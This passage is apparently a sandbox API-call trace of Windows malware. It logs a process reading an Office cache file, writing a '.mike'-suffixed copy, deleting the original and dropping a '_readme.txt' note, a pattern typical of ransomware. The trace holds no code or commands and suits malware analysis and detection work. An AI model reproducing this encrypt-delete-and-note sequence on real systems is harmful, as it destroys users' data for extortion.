lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.705] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.706] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.706] GetFileType (hFile=0x264) returned 0x1 [0040.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.706] GetFileType (hFile=0x264) returned 0x1 [0040.706] CloseHandle (hObject=0x264) returned 1 [0040.707] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.707] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.707] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.707] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.707] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21667d4 | out: lpFileInformation=0x21667d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646)) returned 1 [0040.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.707] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.707] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2166b0c | out: lpFileInformation=0x2166b0c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646)) returned 1 [0040.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.707] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.708] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.708] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.708] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.708] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.709] GetFileType (hFile=0x264) returned 0x1 [0040.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.709] GetFileType (hFile=0x264) returned 0x1 [0040.709] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.709] WriteFile (in: hFile=0x264, lpBuffer=0x2167a48*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2167a48*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.710] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x216751c | out: lpFileInformation=0x216751c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646)) returned 1 [0040.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.710] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.710] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.710] GetFileType (hFile=0x264) returned 0x1 [0040.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.710] GetFileType (hFile=0x264) returned 0x1 [0040.710] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.710] ReadFile (in: hFile=0x264, lpBuffer=0x2168b84, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x2168b84*, lpNumberOfBytesRead=0x2af110*=0x646, lpOverlapped=0x0) returned 1 [0040.712] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.712] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.712] GetFileType (hFile=0x264) returned 0x1 [0040.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.712] GetFileType (hFile=0x264) returned 0x1 [0040.712] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.712] WriteFile (in: hFile=0x264, lpBuffer=0x216e008*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x216e008*, lpNumberOfBytesWritten=0x2af104*=0x650, lpOverlapped=0x0) returned 1 [0040.713] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.713] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.713] GetFileType (hFile=0x264) returned 0x1 [0040.713] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.713] GetFileType (hFile=0x264) returned 0x1 [0040.714] WriteFile (in: hFile=0x264, lpBuffer=0x2171244*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2171244*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.714] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.714] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.714] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.714] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2780360, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2780360, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2780360, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870)) returned 1 [0040.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.714] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike", lpFilePart=0x0) returned 0x52 [0040.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.715] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2172a04 | out: lpFileInformation=0x2172a04*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2780360, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2780360, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2780360, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x870)) returned 1 [0040.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.715] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", dwFileAttributes=0x80) returned 1 [0040.715] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.715] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0040.716] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.716] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.716] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0040.716] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.716] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.717] GetFileType (hFile=0x264) returned 0x1 [0040.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.717] GetFileType (hFile=0x264) returned 0x1 [0040.717] WriteFile (in: hFile=0x264, lpBuffer=0x2174724*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x2174724*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.718] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpFilePart=0x0) returned 0x4a [0040.718] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.718] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.718] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.719] GetFileType (hFile=0x264) returned 0x1 [0040.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.719] GetFileType (hFile=0x264) returned 0x1 [0040.719] CloseHandle (hObject=0x264) returned 1 [0040.719] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.719] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.719] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.719] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.719] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21788a0 | out: lpFileInformation=0x21788a0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 